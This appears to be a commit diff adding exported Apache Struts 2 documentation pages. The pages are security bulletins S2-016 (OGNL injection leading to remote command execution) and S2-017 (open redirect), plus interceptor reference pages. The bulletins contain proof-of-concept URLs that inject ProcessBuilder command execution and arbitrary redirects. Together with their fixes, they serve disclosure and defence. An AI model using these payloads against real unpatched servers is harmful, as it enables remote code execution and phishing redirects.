+            <a href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=33293800">Add News</a>
+        </div>
+    </div>
+
+    <div class="pagecontent">
+        <div class="wiki-content">
+            <div id="ConfluenceContent"><h2><a shape="rect" name="S2-016-Summary"></a>Summary</h2>
+
+
+<p>A vulnerability introduced by manipulating parameters prefixed with "action:"/"redirect:"/"redirectAction:" allows remote command execution</p>
+
+
+<div class="table-wrap">
+<table class="confluenceTable"><tbody><tr><th colspan="1" rowspan="1" class="confluenceTh"> Who should read this </th><td colspan="1" rowspan="1" class="confluenceTd"> All Struts 2 developers and users </td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh"> Impact of vulnerability </th><td colspan="1" rowspan="1" class="confluenceTd"> Remote command execution </td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh"> Maximum security rating </th><td colspan="1" rowspan="1" class="confluenceTd"> Highly Critical </td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh"> Recommendation </th><td colspan="1" rowspan="1" class="confluenceTd"> Developers should immediately upgrade to <a shape="rect" class="external-link" href="http://struts.apache.org/download.cgi#struts23151">Struts 2.3.15.1</a> </td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh"> Affected Software </th><td colspan="1" rowspan="1" class="confluenceTd"> Struts 2.0.0 - Struts 2.3.15 </td></tr><t
 r><th colspan="1" rowspan="1" class="confluenceTh"> Reporter </th><td colspan="1" rowspan="1" class="confluenceTd"> Takeshi Terada of Mitsui Bussan Secure Directions, Inc. </td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh"> CVE Identifier </th><td colspan="1" rowspan="1" class="confluenceTd"> <a shape="rect" class="external-link" href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2251" rel="nofollow">CVE-2013-2251</a> </td></tr></tbody></table>
+</div>
+
+
+<h2><a shape="rect" name="S2-016-Problem"></a>Problem</h2>
+
+<p>The Struts 2 DefaultActionMapper supports a method for short-circuit navigation state changes by prefixing parameters with "action:" or "redirect:", followed by a desired navigational target expression. This mechanism was intended to help with attaching navigational information to buttons within forms.</p>
+
+<p>In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.</p>
+
+<h2><a shape="rect" name="S2-016-Proofofconcept"></a>Proof of concept</h2>
+
+<p>In the Struts Blank App, open following URLs.</p>
+
+<ol><li>Simple Expression - the parameter names are evaluated as OGNL.
+	<ol><li><div class="code panel" style="border-width: 1px;"><div class="codeContent panelContent">
+<script class="theme: Default; brush: java; gutter: false" type="syntaxhighlighter"><![CDATA[http://host/struts2-blank/example/X.action?action:%25{3*4}]]></script>
+</div></div></li><li><div class="code panel" style="border-width: 1px;"><div class="codeContent panelContent">
+<script class="theme: Default; brush: java; gutter: false" type="syntaxhighlighter"><![CDATA[http://host/struts2-showcase/employee/save.action?redirect:%25{3*4}]]></script>
+</div></div></li></ol>
+	</li></ol>
+
+
+<ol><li>Command Execution
+	<ol><li><div class="code panel" style="border-width: 1px;"><div class="codeContent panelContent">
+<script class="theme: Default; brush: java; gutter: false" type="syntaxhighlighter"><![CDATA[http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}]]></script>
+</div></div></li><li><div class="code panel" style="border-width: 1px;"><div class="codeContent panelContent">
+<script class="theme: Default; brush: java; gutter: false" type="syntaxhighlighter"><![CDATA[http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}]]></script>
+</div></div></li><li><div class="code panel" style="border-width: 1px;"><div class="codeContent panelContent">
+<script class="theme: Default; brush: java; gutter: false" type="syntaxhighlighter"><![CDATA[http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}]]></script>
+</div></div></li></ol>
+	</li></ol>
+
+
+<h2><a shape="rect" name="S2-016-Solution"></a>Solution</h2>
+
+<p>DefaultActionMapper was changed to sanitize "action:"-prefixed information properly. The features involved with "redirect:"/"redirectAction:"-prefixed parameters were completely dropped - see also <a shape="rect" href="s2-017.html" title="S2-017">S2-017</a>.</p>
+
+<div class="panelMacro"><table class="warningMacro"><colgroup span="1"><col span="1" width="24"><col span="1"></colgroup><tr><td colspan="1" rowspan="1" valign="top"><img align="middle" src="https://cwiki.apache.org/confluence/images/icons/emoticons/forbidden.gif" width="16" height="16" alt="" border="0"></td><td colspan="1" rowspan="1"><b>It is strongly recommended to upgrade to</b> <b><a shape="rect" class="external-link" href="http://struts.apache.org/download.cgi#struts23151">Struts 2.3.15.1</a></b><b>, which contains the corrected Struts2-Core library.</b></td></tr></table></div></div>
+        </div>
+
+        
+    </div>
+</div>
+<div class="footer">
+    Generated by CXF SiteExporter
+</div>
+</body>
+</html>
\ No newline at end of file

Added: websites/production/struts/content/development/2.x/docs/s2-017.html
==============================================================================
--- websites/production/struts/content/development/2.x/docs/s2-017.html (added)
+++ websites/production/struts/content/development/2.x/docs/s2-017.html Wed Jul 17 09:31:08 2013
@@ -0,0 +1,181 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<!-- 
+Licensed to the Apache Software Foundation (ASF) under one
+or more contributor license agreements.  See the NOTICE file
+distributed with this work for additional information
+regarding copyright ownership.  The ASF licenses this file
+to you under the Apache License, Version 2.0 (the
+"License"); you may not use this file except in compliance
+with the License.  You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing,
+software distributed under the License is distributed on an
+"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+KIND, either express or implied.  See the License for the
+specific language governing permissions and limitations
+under the License. 
+-->
+<html>
+<head>
+    <LINK type="text/css" rel="stylesheet" href="https://struts.apache.org/css/default.css">
+    <style type="text/css">
+        .dp-highlighter {
+            width:95% !important;
+        }
+    </style>
+    <style type="text/css">
+        .footer {
+            background-image:      url('https://cwiki.apache.org/confluence/images/border/border_bottom.gif');
+            background-repeat:     repeat-x;
+            background-position:   left top;
+            padding-top:           4px;
+            color:                 #666;
+        }
+    </style>
+    <link href='http://struts.apache.org/highlighter/style/shCoreStruts.css' rel='stylesheet' type='text/css' />
+    <link href='http://struts.apache.org/highlighter/style/shThemeStruts.css' rel='stylesheet' type='text/css' />
+    <script src='http://struts.apache.org/highlighter/js/shCore.js' type='text/javascript'></script>
+            <script src='http://struts.apache.org/highlighter/js/shBrushJava.js' type='text/javascript'></script>
+    
+    <script type="text/javascript">
+        SyntaxHighlighter.defaults['toolbar'] = false;
+        SyntaxHighlighter.all();
+    </script>
+    <script type="text/javascript" language="javascript">
+        var hide = null;
+        var show = null;
+        var children = null;
+
+        function init() {
+            /* Search form initialization */
+            var form = document.forms['search'];
+            if (form != null) {
+                form.elements['domains'].value = location.hostname;
+                form.elements['sitesearch'].value = location.hostname;
+            }
+
+            /* Children initialization */
+            hide = document.getElementById('hide');
+            show = document.getElementById('show');
+            children = document.all != null ?
+                    document.all['children'] :
+                    document.getElementById('children');
+            if (children != null) {
+                children.style.display = 'none';
+                show.style.display = 'inline';
+                hide.style.display = 'none';
+            }
+        }
+
+        function showChildren() {
+            children.style.display = 'block';
+            show.style.display = 'none';
+            hide.style.display = 'inline';
+        }
+
+        function hideChildren() {
+            children.style.display = 'none';
+            show.style.display = 'inline';
+            hide.style.display = 'none';
+        }
+    </script>
+    <title>S2-017</title>
+</head>
+<body onload="init()">
+<table border="0" cellpadding="2" cellspacing="0" width="100%">
+    <tr class="topBar">
+        <td align="left" valign="middle" class="topBarDiv" align="left" nowrap>
+            &nbsp;<a href="home.html">Home</a>&nbsp;&gt;&nbsp;<a href="security-bulletins.html">Security Bulletins</a>&nbsp;&gt;&nbsp;<a href="s2-017.html">S2-017</a>
+        </td>
+        <td align="right" valign="middle" nowrap>
+            <form name="search" action="http://www.google.com/search" method="get">
+                <input type="hidden" name="ie" value="UTF-8" />
+                <input type="hidden" name="oe" value="UTF-8" />
+                <input type="hidden" name="domains" value="" />
+                <input type="hidden" name="sitesearch" value="" />
+                <input type="text" name="q" maxlength="255" value="" />
+                <input type="submit" name="btnG" value="Google Search" />
+            </form>
+        </td>
+    </tr>
+</table>
+
+<div id="PageContent">
+    <div class="pageheader" style="padding: 6px 0px 0px 0px;">
+        <!-- We'll enable this once we figure out how to access (and save) the logo resource -->
+        <!--img src="/wiki/images/confluence_logo.gif" style="float: left; margin: 4px 4px 4px 10px;" border="0"-->
+        <div style="margin: 0px 10px 0px 10px" class="smalltext">Apache Struts 2 Documentation</div>
+        <div style="margin: 0px 10px 8px 10px"  class="pagetitle">S2-017</div>
+
+        <div class="greynavbar" align="right" style="padding: 2px 10px; margin: 0px;">
+            <a href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=33293806">
+                <img src="https://cwiki.apache.org/confluence/images/icons/notep_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Edit Page"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=33293806">Edit Page</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">
+                <img src="https://cwiki.apache.org/confluence/images/icons/browse_space.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Browse Space"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">Browse Space</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=33293806">
+                <img src="https://cwiki.apache.org/confluence/images/icons/add_page_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Add Page"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=33293806">Add Page</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=33293806">
+                <img src="https://cwiki.apache.org/confluence/images/icons/add_blogentry_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Add News"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=33293806">Add News</a>
+        </div>
+    </div>
+
+    <div class="pagecontent">
+        <div class="wiki-content">
+            <div id="ConfluenceContent"><h2><a shape="rect" name="S2-017-Summary"></a>Summary</h2>
+
+
+<p>A vulnerability introduced by manipulating parameters prefixed with "redirect:"/"redirectAction:" allows for open redirects</p>
+
+
+<div class="table-wrap">
+<table class="confluenceTable"><tbody><tr><th colspan="1" rowspan="1" class="confluenceTh"> Who should read this </th><td colspan="1" rowspan="1" class="confluenceTd"> All Struts 2 developers and users </td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh"> Impact of vulnerability </th><td colspan="1" rowspan="1" class="confluenceTd"> Open redirect </td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh"> Maximum security rating </th><td colspan="1" rowspan="1" class="confluenceTd"> Important</td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh"> Recommendation </th><td colspan="1" rowspan="1" class="confluenceTd"> Developers should immediately upgrade to <a shape="rect" class="external-link" href="http://struts.apache.org/download.cgi#struts23151">Struts 2.3.15.1</a> </td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh"> Affected Software </th><td colspan="1" rowspan="1" class="confluenceTd"> Struts 2.0.0 - Struts 2.3.15 </td></tr><tr><th colspan="1" 
 rowspan="1" class="confluenceTh"> Reporter </th><td colspan="1" rowspan="1" class="confluenceTd"> Takeshi Terada of Mitsui Bussan Secure Directions, Inc. </td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh"> CVE Identifier </th><td colspan="1" rowspan="1" class="confluenceTd"> <a shape="rect" class="external-link" href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2248" rel="nofollow">CVE-2013-2248</a> </td></tr></tbody></table>
+</div>
+
+
+<h2><a shape="rect" name="S2-017-Problem"></a>Problem</h2>
+
+<p>The Struts 2 DefaultActionMapper used to support a method for short-circuit navigation state changes by prefixing parameters with "redirect:" or "redirectAction:", followed by a desired redirect target expression. This mechanism was intended to help with attaching navigational information to buttons within forms.</p>
+
+<p>In Struts 2 before 2.3.15.1 the information following "redirect:" or "redirectAction:" can easily be manipulated to redirect to an arbitrary location.</p>
+
+<h2><a shape="rect" name="S2-017-Proofofconcept"></a>Proof of concept</h2>
+
+<p>In the Struts Showcase App, open following URLs.</p>
+
+<ol><li><div class="code panel" style="border-width: 1px;"><div class="codeContent panelContent">
+<script class="theme: Default; brush: java; gutter: false" type="syntaxhighlighter"><![CDATA[http://host/struts2-showcase/fileupload/upload.action?redirect:http://www.yahoo.com/]]></script>
+</div></div></li><li><div class="code panel" style="border-width: 1px;"><div class="codeContent panelContent">
+<script class="theme: Default; brush: java; gutter: false" type="syntaxhighlighter"><![CDATA[http://host/struts2-showcase/modelDriven/modelDriven.action?redirectAction:http://www.google.com/%23]]></script>
+</div></div></li></ol>
+
+
+<h2><a shape="rect" name="S2-017-Solution"></a>Solution</h2>
+
+<p>DefaultActionMapper was changed to drop the features involved with "redirect:"/"redirectAction:"-prefixed parameters completely - see also <a shape="rect" href="s2-016.html" title="S2-016">S2-016</a>.</p>
+
+<div class="panelMacro"><table class="noteMacro"><colgroup span="1"><col span="1" width="24"><col span="1"></colgroup><tr><td colspan="1" rowspan="1" valign="top"><img align="middle" src="https://cwiki.apache.org/confluence/images/icons/emoticons/warning.gif" width="16" height="16" alt="" border="0"></td><td colspan="1" rowspan="1"><b>Backward Compatibility</b><br clear="none">After upgrading to Struts &gt;= 2.3.15.1, applications using the "redirect:" / "redirectAction:" functionality will no longer work properly. Please investigate your code to replace such expressions with proper fixed navigation rules.</td></tr></table></div>
+
+<div class="panelMacro"><table class="warningMacro"><colgroup span="1"><col span="1" width="24"><col span="1"></colgroup><tr><td colspan="1" rowspan="1" valign="top"><img align="middle" src="https://cwiki.apache.org/confluence/images/icons/emoticons/forbidden.gif" width="16" height="16" alt="" border="0"></td><td colspan="1" rowspan="1"><b>It is strongly recommended to upgrade to</b> <b><a shape="rect" class="external-link" href="http://struts.apache.org/download.cgi#struts23151">Struts 2.3.15.1</a></b><b>, which contains the corrected Struts2-Core library.</b></td></tr></table></div></div>
+        </div>
+
+        
+    </div>
+</div>
+<div class="footer">
+    Generated by CXF SiteExporter
+</div>
+</body>
+</html>
\ No newline at end of file

Added: websites/production/struts/content/development/2.x/docs/scope-interceptor.html
==============================================================================
--- websites/production/struts/content/development/2.x/docs/scope-interceptor.html (added)
+++ websites/production/struts/content/development/2.x/docs/scope-interceptor.html Wed Jul 17 09:31:08 2013
@@ -0,0 +1,236 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<!-- 
+Licensed to the Apache Software Foundation (ASF) under one
+or more contributor license agreements.  See the NOTICE file
+distributed with this work for additional information
+regarding copyright ownership.  The ASF licenses this file
+to you under the Apache License, Version 2.0 (the
+"License"); you may not use this file except in compliance
+with the License.  You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing,
+software distributed under the License is distributed on an
+"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+KIND, either express or implied.  See the License for the
+specific language governing permissions and limitations
+under the License. 
+-->
+<html>
+<head>
+    <LINK type="text/css" rel="stylesheet" href="https://struts.apache.org/css/default.css">
+    <style type="text/css">
+        .dp-highlighter {
+            width:95% !important;
+        }
+    </style>
+    <style type="text/css">
+        .footer {
+            background-image:      url('https://cwiki.apache.org/confluence/images/border/border_bottom.gif');
+            background-repeat:     repeat-x;
+            background-position:   left top;
+            padding-top:           4px;
+            color:                 #666;
+        }
+    </style>
+    <link href='http://struts.apache.org/highlighter/style/shCoreStruts.css' rel='stylesheet' type='text/css' />
+    <link href='http://struts.apache.org/highlighter/style/shThemeStruts.css' rel='stylesheet' type='text/css' />
+    <script src='http://struts.apache.org/highlighter/js/shCore.js' type='text/javascript'></script>
+            <script src='http://struts.apache.org/highlighter/js/shBrushJava.js' type='text/javascript'></script>
+            <script src='http://struts.apache.org/highlighter/js/shBrushXml.js' type='text/javascript'></script>
+    
+    <script type="text/javascript">
+        SyntaxHighlighter.defaults['toolbar'] = false;
+        SyntaxHighlighter.all();
+    </script>
+    <script type="text/javascript" language="javascript">
+        var hide = null;
+        var show = null;
+        var children = null;
+
+        function init() {
+            /* Search form initialization */
+            var form = document.forms['search'];
+            if (form != null) {
+                form.elements['domains'].value = location.hostname;
+                form.elements['sitesearch'].value = location.hostname;
+            }
+
+            /* Children initialization */
+            hide = document.getElementById('hide');
+            show = document.getElementById('show');
+            children = document.all != null ?
+                    document.all['children'] :
+                    document.getElementById('children');
+            if (children != null) {
+                children.style.display = 'none';
+                show.style.display = 'inline';
+                hide.style.display = 'none';
+            }
+        }
+
+        function showChildren() {
+            children.style.display = 'block';
+            show.style.display = 'none';
+            hide.style.display = 'inline';
+        }
+
+        function hideChildren() {
+            children.style.display = 'none';
+            show.style.display = 'inline';
+            hide.style.display = 'none';
+        }
+    </script>
+    <title>Scope Interceptor</title>
+</head>
+<body onload="init()">
+<table border="0" cellpadding="2" cellspacing="0" width="100%">
+    <tr class="topBar">
+        <td align="left" valign="middle" class="topBarDiv" align="left" nowrap>
+            &nbsp;<a href="home.html">Home</a>&nbsp;&gt;&nbsp;<a href="guides.html">Guides</a>&nbsp;&gt;&nbsp;<a href="core-developers-guide.html">Core Developers Guide</a>&nbsp;&gt;&nbsp;<a href="interceptors.html">Interceptors</a>&nbsp;&gt;&nbsp;<a href="scope-interceptor.html">Scope Interceptor</a>
+        </td>
+        <td align="right" valign="middle" nowrap>
+            <form name="search" action="http://www.google.com/search" method="get">
+                <input type="hidden" name="ie" value="UTF-8" />
+                <input type="hidden" name="oe" value="UTF-8" />
+                <input type="hidden" name="domains" value="" />
+                <input type="hidden" name="sitesearch" value="" />
+                <input type="text" name="q" maxlength="255" value="" />
+                <input type="submit" name="btnG" value="Google Search" />
+            </form>
+        </td>
+    </tr>
+</table>
+
+<div id="PageContent">
+    <div class="pageheader" style="padding: 6px 0px 0px 0px;">
+        <!-- We'll enable this once we figure out how to access (and save) the logo resource -->
+        <!--img src="/wiki/images/confluence_logo.gif" style="float: left; margin: 4px 4px 4px 10px;" border="0"-->
+        <div style="margin: 0px 10px 0px 10px" class="smalltext">Apache Struts 2 Documentation</div>
+        <div style="margin: 0px 10px 8px 10px"  class="pagetitle">Scope Interceptor</div>
+
+        <div class="greynavbar" align="right" style="padding: 2px 10px; margin: 0px;">
+            <a href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=13932">
+                <img src="https://cwiki.apache.org/confluence/images/icons/notep_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Edit Page"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=13932">Edit Page</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">
+                <img src="https://cwiki.apache.org/confluence/images/icons/browse_space.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Browse Space"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">Browse Space</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=13932">
+                <img src="https://cwiki.apache.org/confluence/images/icons/add_page_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Add Page"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=13932">Add Page</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=13932">
+                <img src="https://cwiki.apache.org/confluence/images/icons/add_blogentry_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Add News"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=13932">Add News</a>
+        </div>
+    </div>
+
+    <div class="pagecontent">
+        <div class="wiki-content">
+            <div id="ConfluenceContent">
+<p>This is designed to solve a few simple issues related to wizard-like functionality in Struts. One of those issues is
+that some applications have a application-wide parameters commonly used, such <i>pageLen</i> (used for records per
+page). Rather than requiring that each action check if such parameters are supplied, this interceptor can look for
+specified parameters and pull them out of the session.</p>
+
+<p></p><p></p> This works by setting listed properties at action start with values from session/application attributes keyed
+after the action's class, the action's name, or any supplied key. After action is executed all the listed properties
+are taken back and put in session or application context.
+
+<p></p><p></p> To make sure that each execution of the action is consistent it makes use of session-level locking. This way it
+guarantees that each action execution is atomic at the session level. It doesn't guarantee application level
+consistency however there has yet to be enough reasons to do so. Application level consistency would also be a big
+performance overkill.
+
+<p></p><p></p> Note that this interceptor takes a snapshot of action properties just before result is presented (using a {@link
+PreResultListener}), rather than after action is invoked. There is a reason for that: At this moment we know that
+action's state is "complete" as it's values may depend on the rest of the stack and specifically - on the values of
+nested interceptors.
+
+
+<h2><a shape="rect" name="ScopeInterceptor-Parameters"></a>Parameters</h2>
+
+
+<p></p><ul></ul><p></p><ul><li>session - a list of action properties to be bound to session scope</li></ul><p></p><ul><li>application - a list of action properties to be bound to application scope</li></ul><p></p><ul><li>key - a session/application attribute key prefix, can contain following values:</li></ul><p></p><ul></ul><p></p><ul><li>CLASS - that creates a unique key prefix based on action namespace and action class, it's a default value</li></ul><p></p><ul><li>ACTION - creates a unique key prefix based on action namespace and action name</li></ul><p></p><ul><li>any other value is taken literally as key prefix</li></ul><p></p>
+
+<p></p><ul><li>type - with one of the following</li></ul><p></p><ul></ul><p></p><ul><li>start - means it's a start action of the wizard-like action sequence and all session scoped properties are reset
+to their defaults</li></ul><p></p><ul><li>end - means that session scoped properties are removed from session after action is run</li></ul><p></p><ul><li>any other value throws IllegalArgumentException</li></ul><p></p>
+
+<p></p><ul><li>sessionReset - name of a parameter (defaults to 'session.reset') which if set, causes all session values to be reset to action's default values or application
+scope values, note that it is similar to type="start" and in fact it does the same, but in our team it is sometimes
+semantically preferred. We use session scope in two patterns - sometimes there are wizard-like action sequences that
+have start and end, and sometimes we just want simply reset current session values.</li></ul><p></p><ul><li>reset - boolean, defaults to false, if set, it has the same effect as setting all session values to be reset to action's default values or application.</li></ul><p></p><ul><li>autoCreateSession - boolean value, sets if the session should be automatically created.</li></ul>
+
+
+<h2><a shape="rect" name="ScopeInterceptor-ExtendingtheInterceptor"></a>Extending the Interceptor</h2>
+
+
+<p>There are no know extension points for this interceptor.</p>
+
+
+<h2><a shape="rect" name="ScopeInterceptor-Examples"></a>Examples</h2>
+
+<div class="code panel" style="border-width: 1px;"><div class="codeContent panelContent">
+<script class="theme: Default; brush: xml; gutter: false" type="syntaxhighlighter"><![CDATA[
+&lt;!-- As the filter and orderBy parameters are common for all my browse-type actions,
+     you can move control to the scope interceptor. In the session parameter you can list
+     action properties that are going to be automatically managed over session. You can
+     do the same for application-scoped variables--&gt;
+&lt;action name="someAction" class="com.examples.SomeAction"&gt;
+    &lt;interceptor-ref name="basicStack"/&gt;
+    &lt;interceptor-ref name="hibernate"/&gt;
+    &lt;interceptor-ref name="scope"&gt;
+        &lt;param name="session"&gt;filter,orderBy&lt;/param&gt;
+        &lt;param name="autoCreateSession"&gt;true&lt;/param&gt;
+    &lt;/interceptor-ref&gt;
+    &lt;result name="success"&gt;good_result.ftl&lt;/result&gt;
+&lt;/action&gt;
+]]></script>
+</div></div>
+
+<h3><a shape="rect" name="ScopeInterceptor-Somemoreexamples"></a>Some more examples</h3>
+
+<p>The scope interceptor can be used to pass arbitrary objects from one action ActionA to another other ActionB, provided you have a getter in ActionA and and a similar setter in actionB. Also, you should use a key parameter to make sure you tell ASF/WW which action gets which objects. This allows you to mix several actions with several scopes, without running the risk of getting wrong objects.</p>
+
+<div class="code panel" style="border-width: 1px;"><div class="codeContent panelContent">
+<script class="theme: Default; brush: xml; gutter: false" type="syntaxhighlighter"><![CDATA[
+    		&lt;action name="scopea" class="com.mevipro.test.action.ScopeActionA"&gt;
+			&lt;result name="success" type="dispatcher"&gt;/jsp/test.jsp&lt;/result&gt;
+			&lt;interceptor-ref name="basicStack"/&gt;
+			&lt;interceptor-ref name="scope"&gt;
+				&lt;param name="key"&gt;funky&lt;/param&gt;
+        		&lt;param name="session"&gt;person&lt;/param&gt;
+        		&lt;param name="autoCreateSession"&gt;true&lt;/param&gt;
+    		&lt;/interceptor-ref&gt;
+		&lt;/action&gt;
+		&lt;action name="scopeb" class="com.mevipro.test.action.ScopeActionB"&gt;
+			&lt;result name="success" type="dispatcher"&gt;/jsp/test.jsp&lt;/result&gt;
+			&lt;interceptor-ref name="scope"&gt;
+				&lt;param name="key"&gt;funky&lt;/param&gt;
+        		&lt;param name="session"&gt;person&lt;/param&gt;
+        		&lt;param name="autoCreateSession"&gt;true&lt;/param&gt;
+    		&lt;/interceptor-ref&gt;
+			&lt;interceptor-ref name="basicStack"/&gt;
+		&lt;/action&gt;
+]]></script>
+</div></div>
+
+<p>Don't forget: you'll need at least a getPerson() getter in ScopeActionA and a setPerson(Person person) setter in ScopeActionB, &#195;&#161;nd you need to make sure you specify the key (you don't need this if you only use one action, as in the example above). Without the key, the scope interceptor will store your variables, but won't set them on the other action.</p></div>
+        </div>
+
+        
+    </div>
+</div>
+<div class="footer">
+    Generated by CXF SiteExporter
+</div>
+</body>
+</html>
\ No newline at end of file

Added: websites/production/struts/content/development/2.x/docs/scoped-model-driven-interceptor.html
==============================================================================
--- websites/production/struts/content/development/2.x/docs/scoped-model-driven-interceptor.html (added)
+++ websites/production/struts/content/development/2.x/docs/scoped-model-driven-interceptor.html Wed Jul 17 09:31:08 2013
@@ -0,0 +1,184 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<!-- 
+Licensed to the Apache Software Foundation (ASF) under one
+or more contributor license agreements.  See the NOTICE file
+distributed with this work for additional information
+regarding copyright ownership.  The ASF licenses this file
+to you under the Apache License, Version 2.0 (the
+"License"); you may not use this file except in compliance
+with the License.  You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing,
+software distributed under the License is distributed on an
+"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+KIND, either express or implied.  See the License for the
+specific language governing permissions and limitations
+under the License. 
+-->
+<html>
+<head>
+    <LINK type="text/css" rel="stylesheet" href="https://struts.apache.org/css/default.css">
+    <style type="text/css">
+        .dp-highlighter {
+            width:95% !important;
+        }
+    </style>
+    <style type="text/css">
+        .footer {
+            background-image:      url('https://cwiki.apache.org/confluence/images/border/border_bottom.gif');
+            background-repeat:     repeat-x;
+            background-position:   left top;
+            padding-top:           4px;
+            color:                 #666;
+        }
+    </style>
+    <link href='http://struts.apache.org/highlighter/style/shCoreStruts.css' rel='stylesheet' type='text/css' />
+    <link href='http://struts.apache.org/highlighter/style/shThemeStruts.css' rel='stylesheet' type='text/css' />
+    <script src='http://struts.apache.org/highlighter/js/shCore.js' type='text/javascript'></script>
+            <script src='http://struts.apache.org/highlighter/js/shBrushJava.js' type='text/javascript'></script>
+            <script src='http://struts.apache.org/highlighter/js/shBrushXml.js' type='text/javascript'></script>
+    
+    <script type="text/javascript">
+        SyntaxHighlighter.defaults['toolbar'] = false;
+        SyntaxHighlighter.all();
+    </script>
+    <script type="text/javascript" language="javascript">
+        var hide = null;
+        var show = null;
+        var children = null;
+
+        function init() {
+            /* Search form initialization */
+            var form = document.forms['search'];
+            if (form != null) {
+                form.elements['domains'].value = location.hostname;
+                form.elements['sitesearch'].value = location.hostname;
+            }
+
+            /* Children initialization */
+            hide = document.getElementById('hide');
+            show = document.getElementById('show');
+            children = document.all != null ?
+                    document.all['children'] :
+                    document.getElementById('children');
+            if (children != null) {
+                children.style.display = 'none';
+                show.style.display = 'inline';
+                hide.style.display = 'none';
+            }
+        }
+
+        function showChildren() {
+            children.style.display = 'block';
+            show.style.display = 'none';
+            hide.style.display = 'inline';
+        }
+
+        function hideChildren() {
+            children.style.display = 'none';
+            show.style.display = 'inline';
+            hide.style.display = 'none';
+        }
+    </script>
+    <title>Scoped Model Driven Interceptor</title>
+</head>
+<body onload="init()">
+<table border="0" cellpadding="2" cellspacing="0" width="100%">
+    <tr class="topBar">
+        <td align="left" valign="middle" class="topBarDiv" align="left" nowrap>
+            &nbsp;<a href="home.html">Home</a>&nbsp;&gt;&nbsp;<a href="guides.html">Guides</a>&nbsp;&gt;&nbsp;<a href="core-developers-guide.html">Core Developers Guide</a>&nbsp;&gt;&nbsp;<a href="interceptors.html">Interceptors</a>&nbsp;&gt;&nbsp;<a href="scoped-model-driven-interceptor.html">Scoped Model Driven Interceptor</a>
+        </td>
+        <td align="right" valign="middle" nowrap>
+            <form name="search" action="http://www.google.com/search" method="get">
+                <input type="hidden" name="ie" value="UTF-8" />
+                <input type="hidden" name="oe" value="UTF-8" />
+                <input type="hidden" name="domains" value="" />
+                <input type="hidden" name="sitesearch" value="" />
+                <input type="text" name="q" maxlength="255" value="" />
+                <input type="submit" name="btnG" value="Google Search" />
+            </form>
+        </td>
+    </tr>
+</table>
+
+<div id="PageContent">
+    <div class="pageheader" style="padding: 6px 0px 0px 0px;">
+        <!-- We'll enable this once we figure out how to access (and save) the logo resource -->
+        <!--img src="/wiki/images/confluence_logo.gif" style="float: left; margin: 4px 4px 4px 10px;" border="0"-->
